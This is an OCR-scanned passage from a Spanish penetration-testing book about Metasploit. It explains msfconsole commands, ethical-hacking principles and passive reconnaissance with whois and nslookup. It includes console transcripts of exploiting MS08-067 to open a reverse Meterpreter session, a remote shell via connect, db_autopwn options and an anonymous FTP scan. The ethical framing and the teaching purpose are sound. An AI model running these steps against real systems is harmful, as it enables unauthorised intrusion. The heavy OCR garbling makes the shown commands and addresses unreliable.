encuentra  el  modulo  concreto  del  que  se  requiere  obtener  informacion,  Los  datos  que  devuelve  el 
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com  an  do  info  son  todas  las  opciones  del  modulo,  objetivos  y  una  descdpcion.  Por  ejemplo,  en  el 
case  de  la  mayon'a  de  exploits  se  describe  la  vulnerabilidad  y  las  versiones  vulnerables. 

bl  comando  show  permite  mostrar  las  diferentes  opciones  para  los  modulos  del  framework  y  todos 
los  exploits,  payloads,  encoders,  nops,  herramientas,  etc.  Cuando  se  encuentra  seleccionado  un 
modulo,  mediante  el  comando  use,  show  dispone  de  algunas  acciones  mas  conio  es  la  muestra  de 
las  variables  configu rabies  en  el  modulo,  show  options,  o  los  sistemas  operatives  vulnerables,  show 
targets ,  entre  otros, 

msf  >  show 

show  all  show  encoders  show  nops  show  payloads 

show  auxiliary  show  exploits  show  options  show  plugins 

msf  >  use  exploit/multi/browser/ java  signedapplet 
msf  exploit (javasignedjjpplet)  >  show 
show  actions  show  auxiliary  show  exploits  show  payloads 

show  advanced  show  encoders  show  nops  show  plugins 

show  all  show  evasion  show  options  show  post 

msf  exploit ( java^signed_applet)  >  show 

Fig  i .  1 2:  Show  en  funcion  del  ambito  con  sus  opciones. 

Comandos  de  interaction  y  configuration 

La  mayorta  de  los  comandos  que  se  clisponen  en  msfconsole  son  de  interaccion  y  configuracion. 
Estos  comandos  van  desde  la  simple  navegacion  por  la  herramienta,  hasta  ia  ejecucion  de  un  exploit 
con  su  previa  configuracion. 

Comando:  use 

El  comando  use  permite  seleccionar  el  modulo,  a  lo  largo  de  la  estructura  de  directorios  del 
framework,  que  se  requiem.  Una  vez  se  ha  encontrado  una  vulnerabilidad  en  un  si  sterna,  se  puede 
realizar  la  biisqueda  cle  ja  misma  mediante  el  comando  search  o  si  se  conoce  la  rata  d6nde  se  aloja 
el  modulo,  directamente  cargaiio.  Un  ejemplo  serla  use  exploit/multi/handler. 

Comandos:  back,  set,  setg,  unset  y  unsetg 

Existen  comandos  para  la  configuracion  de  valores  en  los  modules  que  el  auditor  necesita 
personal izar  para  el  test  de  intrusion.  Ademas,  se  ha  visto  como  el  comando  use  permite  acceder  a 
mddulos  concretes,  pero  si  el  auditor  requiere  volver  atras,  ^.de  que  comando  dispone?  El  comando 
back  permite  a!  auditor  salir  del  modulo  y  colocarse  de  nuevo  en  la  rafz  de  la  consola. 

Los  comandos  set  y  setg  aportan  una  funcionalidad  imprescindible  para  el  test  de  intrusion  y  es  la 
posibilidad  de  configurar  los  parametros  de  los  distintos  modulos.  Es  decir,  con  estos  parametros 
se  asignaran  valores  a  ias  variables  que  por  ejemplo  definen  un  exploit ,  ^Cual  es  la  diferencia?  Set 
asigna  un  valor  para  un  modulo  concrete,  mientras  que  setg  asigna  ei  valor  para  el  contexto  del 
framework.  Un  slmil  en  programacidn  clasica  serla,  set  asigna  un  valor  a  una  variable  local,  mientras 
que  setg  asigna  un  valor  a  una  variable  global. 


show  post 


show  targets 


May  que  tener  en  cuenta  que  si  se  dispone  de  un  modulo  en  modo  background,  es  decir  cargado  e 
incluso  en  explotacion  o  realizando  alguna  tarea  pero  en  segundo  piano,  y  este  ya  disponla  de  una 
configuracion,  la  asignacion  global  de  un  valor  no  repercutira  sobre  este  elemento. 

Los  comandos  unset  y  unsetg  sirven  para  desasignar  el  valor  de  un  parametro  o  variable  d,e  un 
modulo.  Unset  desasignara  a  nivel  local,  mientras  que  unsetg  desasignara  a  nivel  global. 

Comandos:  connect  e  irb 

El  comando  connect  permite  conectar  desde  la  consola  de  Metasploit  con  otras  maquinas  para  su 
gestion  o  administracion.  Simplemente,  se  debe  indicar  la  direccion  y  el  puerto  al  que  se  quiere 
conectar. 

Este  comando  es  muy  similar  a  la  aplicacion  net  cat  y  totalmente  compatible  con  ella.  Connect 
dispone  de  parametros  interesantes  como  es  la  posibilidad  de  crear  una  conexion  segura  bajo  SSL. 
Se  recomienda  utilizar  este  y  todos  los  comandos  siempre  con  el  comando  help  en  mente: 

msf  >  connect  192.168.0.136  4444 
(*3  Connected  to  192. 168. 8. 136; 4444 
Microsoft  Windows  (Version  6.1.76B1] 

Copyright  (c)  2009  Microsoft  Corporation.  Reservados  todos  los  derechos. 

c :  \Users\bit>whoaHii 

whoami 

bit-pc\pablo 

Fig  1.13:  Conexion  mediante  connect  con  una  n^quina  Windows. 

E!  comando  irb  permite  al  auditor  cjecutar  un  interprete  de  Ruby  para  &  framework  y  de  esta  manera 
se  pueden  ejecutar  comandos  y  crear  scripts  que  automaticen  ciertos  procesos,  todo  ello  en  caliente. 
Esta  funcionalidad  es  interesante  para  conocer  la  estructura  interna  del  framework.  Se  recomienda 
conocer  el  lenguaje  Ruby  para  utilizar  correctamente  este  interprete. 

Comandos:  load,  unload  y  loadpath 

Metasploit  en  su  estructura  interna  dispone  de  una  carpeta  donde  aloja  los  plugins.  El  comando  load 
permite  especificar  que  plugin  se  quiere  cargar.  Por  lo  que  si  se  anaden  nuevos  plugins  al  framework 
se  deberan  almacenar  en  dicha  carpeta.  Por  otro  Iado,  si  se  quiere  quitar  un  plugin  del  entorno  se 
utilizara  el  comando  unload.  .  ,i 

Tambien  se  dispone  de  un  comando  al  cual  se  le  especifica  un  directorio  donde  se  pueden  enconlrar 
almacenados  modulos,  plugins  o  exploits  externos  al  framework,  y  disponer  de  0-day,  exploits, 
payloads,  en  un  directorio  de  trabajo  independiente. 

msf  >  load  wmap 

|[*3  [WMAP  1.0]  =  et  [  ]  metasploit.com  2011 

■  ;[*1  Successfully  loaded  plugin:  wmap 
msf  > 


Fig  1 . 1-4:  Cargando  un  plugin  en  e\  framework. 
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Comandos:  check,  exploit  y  sessions 

Cuando  el  auditor  se  encuentra  en  la  fase  de  explotacion,  es  decir,  ya  ha  encontrado  la  o  las 
vulnerabilidades  por  donde  atacar  al  sistema,  el  comando  check  aporta  la  postbilidad  de  verificar  si 
el  sistema  es  vulnerable  o  no,  antes  de  lanzar  el  script. 

£1  comando  exploit  ianza,  una  vez  configurado  el  modulo  seleccionado,  el  codigo  maiicioso  sobre 
una  maquina  o  prepara  el  entorno  para  que  una  maquina  sea  vuinerada  al  acceder  a  un  sitio  en  la  red. 
El  comando  dispone  de  varies  parametros  interesantes  los  cuales  se  especifican  en  la  siguiente  labia: 


Parametro 

Description 

“j 

El  exploit  es  ejecutado  en  segundo  piano 

-z 

No  se  interactua  con  la  sesion  tras  una  explotacion  exitosa 

-e 

Se  lanza  el  payload  con  la  codification  mediante  un  encoder  previamente 

Tab  la  1.0!:  Parametros  del  comando  exploit. 


Por  lo  general,  el  comando  exploit  devolvera  el  control  del  sistema  remoto  mediante  una  shell 
o  un  meterpreter.  Por  ultimo,  las  shell  que  se  obtienen  se  organizan  por  conexiones  y  estas  son 
visualizadas  por  el  comando  sessions.  Este  comando  permite  listar  el  numero  de  conexiones  con 
maquinas  vulneradas  que  se  disponen,  que  via  ha  sido  la  que  ha  conseguido  vulnerar  la  maquina, 
informacion  sobre  los  puertos  y  direcciones  IP,  el  tipo  de  payload,  etc.  Es  importante  entender  que 
las  sesiones  tienen  un  identificador  unico  y  que  se  debe  especificar  dicho  identificador  cuando  se 
quiere  interactuar  con  una  sesidn  remota.  Los  identificadores  son  numeros  enteros,  la  primera  sesion 
abierta  dispondra  del  numero  1  y  van  aumentando  con  ntievas  sesiones  que  se  vayan  consiguiendo. 
En  la  siguiente  tabla  se  muestran  los  distintos  parametros  que  dispone  el  comando  sessions: 


Parametro 

Descripcidn 

-1 

Lista  las  sesiones  disponibles 

-v 

Muestra  informacion  extra,  es  interesante  uti lizarlo  junto  al  parametro  -1 

-s 

Ejecuta  un  script  de  Metasploit  sobre  todas  las  sesiones  le  Meterpreter  disponibles. 
Su  uso  serla  sessions  -s  <script> 

-K 

Final iza  todas  las  sesiones  abiertas 

-c 

Ejecuta  un  comando  sobre  todas  las  sesiones  de  Meterpreter  abiertas.  Su  uso  serla 
sessions  -c  "ping  8. 8.8.8" 

-u 

Uno  de  los  mas  interesantes,  permite  actualizar  la  shell  remota  de  tipo  Win32  a  un 
Meterpreter.  Se  debe  especificar  el  ID  de  la  sesidn 

-i 

Con  este  parametro  se  le  indica  al  comando  sessions  en  que  sesion  se  quiere 
interactuar.  Un  ejemplo  es  sessions  -i  l 

Tabla  1.02:  Parametros  del  comando  sessions. 


jgsf  exploit  (msO8_067_netapi)  >  check  — - - - - - 

I*]  Verifying  vulnerable  status...  (path;  0x00000053) 

!*!  Uie  target  is  vulnerable. 

exploit (ms88j)67_nBtapi)  >  exploit  -j 
1*3  Exploit  running  as  background  job. 

1*3  Started  reverse  handler  on  192. 168.8. 55:4444 
iif  exploit(ms08_067_netapi)  >  [*]  Automatically  detecting  the  taroet 
K*3  Fingerprint:  Windows  XP  -  Service  Pack  3  -  lang Spanish 
i*J  Selected  Target:  Windows  XP  SP3  Spanish  (NX) 

Attempting  to  trigger  the  vulnerability... 

Sending  stage  (749656  bytes)  to  192,168. 0.54 

f‘)  Meterpreter  session  1  opened  (192.168.8.55:4444  ->  is2.i68  @  54.1043)  at  201 
2-05-25  06:42:20  -6400  «<.iou.b.54.M43J  at  201 

fflil  exploit (msBS  067_netapi)  >  sessions  -l 
Active  sessions 


Id  Type 


Information 


Connection 


1  meterpreter  x86/win32  NT  AUTH0iUTY\SYST£M  @  PRUEBAS-01760CC  192168  0  55 
:4444  ->  192.168.0.54:1043  192.108. 0.55 


Fig  1.15:  Verification,  explotaei6n  c  intcraccibn  con  sistema  remoto. 


Comandos:  resource  y  makerc 

El  comando  resource  permite  la  carga  de  un  fichero,  generataente  especificado  con  la  extension  re 
la  cual  no  es  necesana.  con  acciones  especlficas  sobre  el  framework.  Esle  comando  es  muy  uti  lizado 
para  aulomalizar  (areas  que  se  deben  realizar  con  Melasploit  y  las  cuales  se  couocen  de  antemano  o 
se  ban  realizado  previamente. 

El  comando  makerc  almacena  en  un  fichero  el  hislorial  de  comandos  y  acciones  que  se  ban 
realizado  en  la  sesion  en  curso  con  el  framework.  Es  decir,  si  se  requiere  guardar  el  hislorial  del 
trabajo  realizado  durante  el  dla  con  Metasploit,  makerc  genera  un  listado  con  toda  esta  informacion 
aimacenandolo  en  el  fichero  que  se  le  indique.  Por  defocto,  este  fichero  se  genera  en  el  home  del 
usuario  en  un  directorio  oculto  denominado  .msJ3,  aunque  depended  de  la  version  de  Metasploit 
que  se  este  utilizando. 


ffl§l  expVoit(psexec)  >  makerc  i64 
{*]  Saving  last  4  commands  to  i64  ... 
ms f  exploit(psexec)  >  exit 

f*l  You  have  active  sessions  open,  to  exit  anyway  type  "exit  -y" 
iif  exploit (psexec)  >  exit  -y 
rootgroot ; cat  .msf3/i64 
search  smb 

use  exploit/windows/smb/psexec 
show  options 

show  targets _ . _ _ 

Fig  1.16:  Generation  de  hislorial  de  sesion. 


Comandos:  save  y  jobs 

El  comando  save  aporta  persistence  a  la  configuracidn  del  entorno.  Esto  es  algo  realmente  util 
cuando  el  test  de  intrusion  es  largo  y  con  un  gran  numero  de  caraclensticas.  El  fichero  con  ia 
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configuracion  se  almacena  en  el  home  del  usuario  en  la  carpeta  oculta  .ms ft  y  tiene  como  nombre 
twj/ig.’Cuando  se  lanza  msf console,  este  comprueba  la  existencia  de  diclic  fichero  y  si  existc  earga 
la  configuracion  almacenada  en  el. 

R I  comando jobs  mueslra  los  modu  los  que  se  encuentran  en  ejecucion  en  segundo  piano  o  background. 
Este  comando,  ademas,  permite  finalizar  otros  trabajos  que  se  estan  ejecutando  en  segundo  piano  y 
obiener  informacion  detallada  sobre  los  modulos  en  ejecucion. 

Comando:  run 

lil  comando  rim  permife  realizar  la  ejecucion  de  un  modulo  auxiliary  eargado  c.n  el  contexto  de  la 
consola. 


insf  >  use  auxiliary/scanner/ftp/anonymous 

Bisf  auxiliary  (anonymous)  >  set  RHOSTS  ftp.fi.upni.es 

[{HOSTS  =>  ftp.  sasKgsm.es 

msf  auxiliary (anonymous)  >  run 

I*)  133. 188.8.17:21  Anonymous  READ  (220  ProFTPO  1.2.0  Server  (ProFTPR  Default  Installation)  [?m 
ss.ra.gsaap.es]  5 

{*1  Scanned  l  of  l  hosts  (163%  complete) 

1*3  Auxiliary  module  execution  completed 
msf  auxiliary (anonymous)  >  | 

Fig  3.17:  Ejecucion  de  un  modulo  auxiliary  con  run. 

Comando:  route 

Este  comando  permits  enrutar  sockets  a  sesiones,  disponiendo  de  un  funcionamiento  similar  ai 
comando  route  en  Linux.  Ademas,  permite  la  adicion  de  subredes,  Huertas  tie  enlace  o  gateways  v 
mascaras  de  red.  Este  comando  puede  ser  muy  util  en  la  tecnica  conocida  como  pivoting. 


Comandos  de  base  de  datos 

Metasploit  permite  la  utiiizacion  de  informacion  almacenada  en  bases  de  dates  por  otras  herramiemas 
de  recog  i  da  de  informacion  v  analisis.  Esta  funcionalidad  es  de  gran  in  teres  en  un  test  dc  intrusion, 
ya  que  en  funcion  de  dicha  informacion  se  pueden  ir  realizando  distintas  pruebas  sobre  los  sistemas 
de  ia  organization. 


R»Sf  >  db 

db  add  cred 

db  del  port 

db  import  amap  mloq 

db  nmap 

db  add  host 

db  destroy 

db  import  ip360  xml 

db  notes 

db  add  note 

db  disconnect 

db  import  ip  list 

db  services 

db  add  port 

db  driver 

db  import  msfe  xml 

db  status 

dbautopwn 

db  exploited 

db  import  nessus  nbe 

db  sync 

db  connect 

db  export 

db  import  nessus  xml 

db  vulns 

db  create 

db  hosts 

db  import  nmap  xml 

db  workspace 

db  creds 

db  import 

db  import  qualys  xml 

db_del_host 

db_import_afnap  log 

dbloot 

Fig  1 . 1 8:  Comandos  de  Metasploit  con  interaccion  con  la  base  dc  dalos. 


Comando:  dbdriver 

El  comando  db  driver  indica  las  bases  de  datos  que  se  encuentran  disponibles  para  que  Metasploit 
las  Litilice  y  la  base  de  datos  con  figurada  por  defecto.  Este  comando  permite  cambiar  la  base  de  datos 
que  ei  auditor  quiere  utilizar. 


msf  >  dbdriver 

f*i  Active  Driver:  mysc|l 

1*3  Available:  postgresql,  mysqt 

ffisf  >  db  driver  postgresql 

1*3  Using  database  driver  postgresql 

msf  >  db_cf  river 

i*i  Active  Driver:  postgresql 

1*1  Available:  postgresql,  mysql 

Fig  1. 19:  Ejecucion  de  dbdriver. 


Comando:  db  connect 

Ei  comando  db_connec(  crea  y  conecta  con  ia  base  de  datos.  Previamente,  se  debe  configurer 
el  usuario  en  la  base  de  datos.  Este  comando  prepara  todas  las  tablas  en  la  base  de  datos  que  se 
Hliiizaran  en  la  recoleccion  de  informacion  y  analisis  para  alniacenar  los  datos  obtenidos  de  los 
sistemas  que  se  esten  auditando. 


*  uo  conneci  i)O5tgres:^3anc,@l27.0.g,l/metasploit  - - - — 

IKOTICE:  CHE ATE  TABLE  will  create  implicit  sequence  “hosts  id  seq"  for  serial  column  “hosts. id" 
[NOTICE:  CFiEAff  I  ABIE  /  PRIMARY  KEY  will  create  implicit  index  “hosts  pkey”  for  table  “hosts" 
NOTICE:  LREAIF  TABLE  will  create  implicit  sequence  "clients J.d_seq"  for  serial  column  "clients. 

[NOTICE:  CREATE  TABLE  /  PRIMARY  KEY  will  create  implicit  index  "clientspkey"  for  table  "clients 

NOTICE:  CREATE  TABLE  will  create  implicit  sequence  "services  id  seq"  for  serial  column  “service 
I $. id  “  ~ 

NOTICE:  CREATE  TABLE  /  primary  KEY  will  create  implicit  index  “services  pkey"  for  table  “servic 


Fig  1 .20:  Crear  y  collector  con  !a  base  de  datos  en  Metasploit. 


Comandos:  db  nmap  y  dbautopwn 

t\  comando  dbjrmap  ejecuta  la  berramienta  nmap  y  almacena  todos  los  resultados  del  escaneo 
eu  las  tablas  prepaiaclas  en  ia  base  de  datos  previamente.  El  auditor  debe  conocer  los  distintos 
modvficadores  o  pararnetros  de  este  escaner  para  sacar  el  maxi  mo  provecho  a  este  proceso.  Con  el 
parametro  -h  se  muestra  la  ayuda  de  dbjimap  donde  se  pueden  consultar  los  distintos  modifieadores 
para  ios  distintos  tipos  de  escaneos. 

K1  comando  db_  autopwn  ayuda  al  auditor  a  lanzar  una  coleccion  de  exploits  frente  a  nna  o  varias 
maqumas  de  las  cuales  se  ha  obtenido  informacion,  como  pueden  ser  puertos  abiertos,  versiones 
de  productos  detras  de  dichos  puertos,  versiones  del  sistema  operative,  etcetera.  Este  comando  es 
conocido  como  la  metralleta  de  Metasploit  y  automatiza  en  gran  parte  ei  proceso  del  lanzamiento  cle 
exploits  sobre  vulnerabilidades  descubiertas.  Hay  que  tener  en  cuenta  que  en  las  ultimas  versiones 
de  Metasploit .  en  su  edicion  Community,  este  comando  lia  sido  eliminado.  Si  se  quiere  seguir 
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utilizando  se  recoraienda  actual izar  manualmente  ei framework  y  no  utilizar  el  comando  msf update 
para  actualizar  Metasploit. 

Como  parametros  interesantes  se  especifican  los  siguientes: 


Parametro 

Descripcion 

-l 

Muestra  todos  los  exploits  que  se  estan  probando 

-X 

Seleeciona  los  modulos  basados  en  vulnerabilidades  refereneiadas 

-P 

Selecciona  los  modulos  basados  en  puertos  abiertos 

-e 

Lanza  exploits  contra  todos  los  equipos  objetivo 

-r 

Uliliza  una  shell  inversa  Iras  la  explotacion  ^ 

-b 

Utiliza  una  shell  atada  a  un  puerto  aleatorio 

-R 

Se  le  pasa  un  rank ,  para  solo  seleccionar  modulos  con  cierta  nivel.  La  ejecucion 
serla  db  autopwn  -p  -t  -e  -r  -R  good 

Tabla  1 .03:  Parametros  del  comando  dbjmtopwn.  , 


Comando:  db  hosts 

Este  comando  lista  las  maquinas  que  se  encuentran  alojadas  en  la  base  de  datos.  Proporciona 
information  interesante  sobre  los  distintos  equipos  que  seran  auditados  y  de  los  que  se  disponen 

datos. 


Se  pueden  observar  datos  como  el  sistema  operativo  de  la  maquina,  direccion  MAC,  la  version  del 
service  pack  y  mas  informacion  de  utilidad. 


msf  >  db_hosts 

Hosts 

address  mac 

name 

osnaine 

os 

flavor  os_sp 

purpose  info  comments 

138.10Q.8.47 

192.168.0.54 

PRUEBAS-01760CC 

Microsoft  Windows 

XP 

SP3 

device 

Fig  1.21:  Listado  de  maquinas  nlmacenados  en  la  base  de  datos. 


Comando:  db  destroy  . 

Este  comando  elimina  la  base  de  datos  que  esta  utilizando  en  un  momenta  dado.  Tambien  se  puede 
indicar  la  elimination  de  la  base  de  datos  de  la  siguiente  manera  dbjlestroy  userpassword @ 
host: por t/database. 


6.  Notas  eticas 

Historicamente  el  tdrmino  hacker  ha  definido  a  la  persona  con  altos  conocimientos  tecnicos  sobre 
seguridad  informatica,  o  informatica  en  general,  el  cttal  dispone  de  la  capacidad  de  invesfigar, 
aprender  e  introducirse  en  sistemas  remotos  sin  autorizacidn  previa  a  traves  de  Internet.  Las  teenicas 
utilizadas  por  estos  son  diversas,  pueden  ir  desde  la  investigation  de  un  fall©  de  seguridad  en  alguna 
aplicacion  que  da  acceso  a  una  base  de  datos,  como  el  engano  o  engalusamiento  de  una  persona 
con  cierlos  privilegios  sobre  un  sistema  mediante  ingenierta  social.  Tambien  hay  que  recalcar 
que  historicamente,  la  Jllosofta  del  hacker  ha  propuesto  la  iibertad  del  conociraiento  a  traves  dc 
los  medios  digitales,  es  deeir,  utilizar  la  capacidad  para  visualizar  informacion  no  autorizadii  sin 
intention  de  realizar  ninguna  accion  sobre  ella  que  pueda  otorgar  un  beneficio  al  hacker. 

Ahora,  ^que  es  el  hacking  etico?  A  lo  largo  del  tiempo,  el  hacker  ha  sido  tachado  negal  ivamente,  por 
lo  que  la  vision  de  la  sociedad  sobre  el,  no  es  lo  que  su  ftlosofia  ptanteaba.  Quiza,  esto  ha  ocurrido 
por  la  autoproclamacion  de  algunos  a  llamarse  hackers  y  realizar  acciones  sobre  sistemas  con 
objelivos  de  dudosa  moral,  ya  sean  economicos  o  el  simple  hecho  de  realizar  una  accion  negativa 
sobre  un  usuario  u  organ  izacion. 

El  hacking  etico  nace  comp  una  metodologia  en  la  que  se  intenta  educar  y  aprovechar  las  capacidades 
de  las  personas  apasionadas  con  la  seguridad  informatica.  Estas  personas  o  profesionales  del  sector 
realizaran  ataques  informaticos  a  organizaciones  sin  que  estos  sean  ataques  reales,  es  deeir,  se 
comprueba  el  estado  de  seguridad  en  el  que  se  encuentra  la  organizacidn  de  una  manera  controlada. 
Estos  profesionales  deben  disponer  de  la  etica  profesionai  para  no  aprovecharse  de  sus  conocimientos 
ni  de  las  situaciones  que  pueden  surgir.  Por  ejemplo,  puede  darse  la  siguiente  situacidn:  Una  empresa 
quiere  auditar  y  comprobar  hasta  donde  puede  llegar  un  usuario,  con  un  nivel  de  acceso  bajo  a  cierta 
informacion  de  la  empresa  que  reside  en  un  sistema  critico  de  esta.  La  empresa  decide  contratar 
a  alguien  que  simule  ser  un  empleado  con  cierta  nivel  de  acceso,  y  ver  hasta  donde  puede  llegar. 
Una  vez  esta  persona  ha  logrado  acceder  a  la  informacion  que  la  empresa  no  qtierla  moslrar,  este 
informa  a  la  organizacidn  de  que  procedimiento  ha  llevado  a  cabo  para  lograr  el  objetivo.  La  persona 
contratada  debe  disponer  de  una  etica  profesionai,  ya  que  si  la  empresa  contra tase  a  alguien  sin  dicha 
etica,  se  encontradan,  seguramente,  con  bastantes  problemas  de  confidencialidad. 

El  profesionai  de  la  seguridad  dispone  de  una  etica,  la  cual  es  la  marca  e  imagen  de  todo  su  trabajo. 
A  continuacidn  se  exponen  buenas  practicas  a  llevar  a  cabo  en  un  proceso  de  auditorla,  las  cuales 
pueden  ser  tomadas  por  cualquier  profesionai  para  construir  su  etica: 

-  No  ataear  objetivos  sin  el  respaido  de  un  contrato  o  permiso  escrito. 

-  Generar  el  mejor  informe  posible,  tanto  en  su  formato  teenico,  con  un  proceso  elaborado 
y  detallado  de  las  acciones  Uevadas  a  cabo,  como  en  su  formato  ejecutivo,  explieando  con 
gran  detalle  los  problemas  de  seguridad  encontrados. 

-  No  realizar  acciones  maliciosas  sobre  los  sistemas  que  se  esten  verificando  en  la 
organizacidn. 


M 
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-  Hay  que  considerar  que  toda  accion  tiene  consecuencias.  Si  se  realizan  acciones  fuera  del 
ambito’  del.contrato  se  fe  'ran,  consecuencias  neiativas  para  el  ofesional. 

Si  se  realizan  action^  de  manera  ilegal,  el  jJrofesioual  puede  acabar  siendo  investigado 
o  denunciado,  incluso  pud.eudo  acabar  siendo  co  idenado. 

-  Maxima  confidencialidad  sobre  la  infonnacio  i  que  se  puede  ir  obteniendo  en  el  proceso 

de  las  pruebas.  {/  1 


Respelar  la  pj  Jvacidad  de  los  usuarios. 

lil  ohjclivo  de  este  librofes  presenlar  la  herramienta  Melmploil  en'el  dmbilo  de  los  lest  de  intrusion 
de  una  manera  elica  y  moral  para  el  protesional  del  sector  de  la  seguridad.  * 


1.  Ambito 

entender  mejor  la  infraestructura  de  la  emnrp<n  i  Cr<?r  c*e  iec!  (,e  ,a  organization  para  ' 
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2.  Recogida  de  informacion 

En  la  fase  de  recogida  de  informacion  se  disponen  de  varias  tecnicas  o  vias  para  recolectai  ios  datos. 
El  foolprinting  consiste  en  la  busqueda  de  cualquier  tipo  de  informacion  publica,  la  cual  ha  sido 
publicada  a  proposifo  o  con desconocimiento  de  la  organizacion.  Con  la  realizacion  de  este  proceso  se 
buscaran  todas  las  huellas  posibles,  desde  direcciones  IP  perteneeientes  a  la  organizacion,  servidores 
infernos,  cuentas  de  correos  de  ios  usuarios  de  la  empresa,  nombres  de  maquinas,  informacion  de 
dominio,  tipos  de  servidores,  impresoras,  camaras  IP,  metadatas,  etcetera.  En  conclusion,  cualquier 
dato  que puede  resullar  util  para  lanzar  distintos  ataques  en  las  Jases  posteriores  del  test  de  intrusion. 

El  fingerprinting  consiste  en  analizar  las  huellas  que  dejan  las  maquinas,  por  ejempio  para  obtener 
el  sistema  operative,  la  version  de  una  aplicacion,  puertos  abiertos,  existencia  dcfirewalis,  etcetera. 
Las  huellas  se  detectan  a  trave^del  analisis  de  las  conexiones  de  red  de  estas  maquinas,  por  ejempio, 
en  el  tipo  y  forma  de  las  resptiestas  al  eslabieeimiento  de  las  conexiones.  Este  proceso  es  llevado  a 
cabo  a  traves  de  2  maneras,  <je  forma  acti.va,  es  decir,  las  herramientas  envlan  paquetes  esperando 
una  respuesta,  y  en  funcion  de  dicha  respuesta  se  pueden  inferir  ciertas  propiedades  de  ciertas 
tecnologias  concretas.  Se  utiliza  una  base  de  datos  donde  se  va  comparando  para  obtenei  la  realidad. 
La  otra  via  es  la  pasiva,  donde  la  herramienta  escucha  el  trafico  para  identi Rear  maquinas  que  actuan 
en  la  red  comparando  las  respuestas  pero  sin  llegar  a  interactuar  en  la  red. 


Tecnicas  pasivas 

La  recoleccion  de  informacion  pasiva  o  indirecta  consiste  en  descubrir  datos  sobre  los  objetivos  sin 
tocar  los  sistemas,  es  decir,  sin  interaccion  directa  sobre  los  mismos.  Se  puede  utilizar  esta  tecnica 
para  identillcar  los  limites  de  la  red,  las  principales  redes,  etcetera. 

Ex  is  ten  varias  herramientas  que  permiten  la  recoleccion  de  informacion  pasiva,.  conio  pueden  set 
whois,  nslookup,  google  hacking,  fuzzers,  etcetera.  Si  se  imagine  tin  ataque  contra  el  dominio  de  una 
empresa  que  contrata  unos  servicios,  el  objetivo  del  auditor  en  esta  fase  es  determinar,  como  parte 
de  un  test  de  intrusion,  que  sistemas  de  la  organizacion  se  pueden  atacar.  En  esta  fase,  se  pueden 
descubrir  sistemas  que  parecen  de  la  organizacion  pero  no  lo  son,  por  lo  que  se  debenan  descartar 
por  encontrarse  fuera  del  alcance  de  la  prueba  de  intrusion. 

Whois 

Las  herramientas  clel  sistema  se  pueden  lanzar  desde  una  terminal  de  Linux  o  desde  el  interior  de 
msfconsole.  En  realidad,  cuando  se  ejecuta  una  herramienta  de  este  tipo  desde  msfconsole,  esta  lanza 
un  exec  del  ejecutable  que  se  requiere. 

Whois  es  una  herramienta  que  permite  al  auditor  o  cualquier  usuario  realizar  consultas  en  una  base 
de  datos  para  determinar  el  propietario  de  un  nombre  de  dominio  o  una  direccibn  IP  en  la  gran  red, 
Internet.  Hoy  en  dia,  existen  gran  cantidad  de  sitios  web  que  ofrecen  esta  disponibilidad  online 
aportando  interfaces  mas  amigables  a  los  usuarios. 


La  informacion  que  se  puede  obtener  con  whois  es  la  referente  a  los  servidores  DNS,  domain 
name  system ,  donde  se  encuentra  alojado  el  dominio,  y  quien  es  el  propietario.  Estos  servidores 
no  debenan  entrar  en  un  test  de  intrusion,  por  lo  general,  ya  que  se  pueden  eneontrar  fuera  de  los 
limites  de  la  organizacion,  e  incluso  pueden  ser  compartidos.  Sin  embargo,  si  la  organizacion  es 
grande  y  dispone  de  sus  propios  DNS,  si  puede  ser  factible  el  introducirlos  en  un  test  de  intrusion. 
Existen  ataques  sobre  estos  servidores,  los  cuales  pueden  proporcionar  gran  cantidad  de  informacion 
e  incluso  mapas  de  red  internos. 


asi  >  whois  infor»atic864.coa 
f * J  exec;  wliois  informatica64.con 


Whois  Server  Version  2.0 

Domain  names  in  the  .com  anti  .net  domains  can  now  be  registered  1 

with  many  different  competing  registrars.  Co  to  http;//www. internic.net 
for  detailed  information. 

Domain  Name;  INF0RIWTICA64 ,  COH 

Hegistrar:  ARSYS  INTERNET,  S.L.  D/B/A  NICUNE.COH 

Whois  Server:  whois.nicline.com 

Referral  URL:  http://www.nicline.com 

Name  Server:  NSl.INEOflHATICA64.COH 

Name  Server:  NS2.INFOW4ATICA64.COH 

Status:  ok 

Updated  Date:  82-sep-2811 
Creation  Date:  3B-aug-208O 
Expiration  Date:  38-aug-2B21 

»>  Last  update  of  whois  database:  Tue,  29  Hay  2812  87:37:52  UTC  «< 

Fig  2.01 :  Ejecucioit  de  whois  sobre  un  dominio. 

Nslookup 

Esta  herramienta  permite,  entre  otras  cosas,  verificar  si  el  servidor  DNS  esta  resolviendo 
correctamente  los  nombres  de  dominio  y  las  direcciones  IP.  Existe  una  version  tanto  para  sistemas 
operatives  Windows  como  para  sistemas  basados  en  Unix. 

Esta  aplicacion  pregunta  al  servidor  DNS  por  la  informacion  que  este  dispone  en  sus  registros.  Las 
consultas  pueden  ser  globales  o  especificas  hacia  un  servicio  en  concreto,  por  ejempio,  si  se  requiere 
resolver  donde  se  eneuentran  los  servidores  de  correo  de  una  organizacion,  o  cuales  son  y  donde  se 
encuentran  los  servidores  DNS,  si  dispone  de  alguno  mas  u  obtener  la  direccion  IP  del  servidor  web 
donde  se  encuentra  alojada  el  sitio  web,  etcetera. 

Tras  lanzar  la  aplicacion,  ya,  sea  en  Windows  o  Linux,  se  disponen  de  distintos  comandos  para 
configurar  a  nslookup  y  que  este  realice  las  peticiones  como  se  requiera.  Uno  de  los  comandos  que 
mas  juego  aporta  es  set,  con  el  que  se  configuraran  las  peticiones  y  la  informacion  que  se  recogera  de 
los  servidores  DNS.  Por  defecto,  tras  arrancar  la  aplicacion  nslookup  envla  las  peticiones  al  servidor 
DNS  configurado  en  la  conexion  a  Intemet,  Existe  el  comando  server  con  el  que  el  usuario  puede 
especificar  a  que  servidor  DNS  quiere  enviar  las  peticiones. 

Para  consullar  informacion  sobre  un  dominio,  simplemente  hay  que  escribir  el  nombre  del  dominio, 
por  ejempio  informatica64.com,  en  la  consola  que  abre  nslookup.  Para  obtener  el  taAximo  de 
informacion  sobre  el  dominio  se  puede  utilizar  la  sentencia  set  q=any  para  la  version  basada  en 
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Unix  y  set  q=all  para  la  version  basada  en  Windows.  Aliora  si  se  ejecuta  la  sentencia  anterior  donde 
se  pregunta  po.r  informacion  de  un  dominio,  se  obtendra  baslante  mas  informacion,  como  puede  ser 
nombres  de  dominio  de  los  servidores  DNS,  servidores  de  correo,  servidor  del  sitio  web.  direecion 
de  correo  del  administrador,  etcetera. 


>  set  q=any  — —  ___  . 

